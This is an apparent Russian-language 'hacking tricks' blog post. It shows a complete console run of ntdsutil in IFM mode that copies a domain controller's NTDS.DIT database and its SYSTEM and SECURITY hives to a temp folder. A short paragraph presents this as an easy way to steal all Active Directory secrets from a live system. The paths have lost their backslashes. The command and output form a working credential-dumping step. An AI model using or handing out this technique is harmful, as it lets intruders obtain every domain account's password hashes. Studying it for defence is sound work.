Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.
C:Windowssystem32>ntdsutil "ac in ntds" "ifm" "cr fu c:WindowsTempabc" q q
ntdsutil: ac in ntds
Активный экземпляр - "ntds".
ntdsutil: ifm
IFM: cr fu c:WindowsTempabc
Создание снимка...
Успешно создан набор снимков {8d6cf811-ccd4-4dbe-9190-b911bb96196a}.
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} установлен как C:$SNAP_2014041214
02_VOLUMEC$
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} уже подключен.
Запуск режима ДЕФРАГМЕНТАЦИИ...
Исходная база данных: C:$SNAP_201404121402_VOLUMEC$WindowsNTDSntds.dit
Конечная база данных: c:WindowsTempabcActive Directoryntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Копирование файлов реестра...
Копирование c:WindowsTempabcregistrySYSTEM
Копирование c:WindowsTempabcregistrySECURITY
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} отключен.
Носитель IFM успешно создан в c:WindowsTempabc
IFM: q
ntdsutil: q
C:Windowssystem32>
[hacking tricks] Easy way to get a ntds.dit
[hacking tricks] Easy way to get a ntds.dit
Все секреты Active Directory как известно хранятся в одном единственном файлике NTDS.DIT, который представляет из себя специально разработанную компанией Microsoft базу данных. Для получения копии этой базы варварским способом может использоваться механизм теневых копий. Почему варварским? Да потому, что в момент создания теневой копии в базе могут выполняться различные транзакции, что несколько повлияет на целостность полученной копии. Но начиная с Windows 2008 корпорация добра расширила возможности утилиты Ntdsutil, что позволяет стащить базу NTDS.DIT с работающей системы не повредив ее при этом. Раньше применение утилиты Ntdsutil ограничивалось режимом восстановления контроллера домена .
Спасибо за находку @obscuresec!!
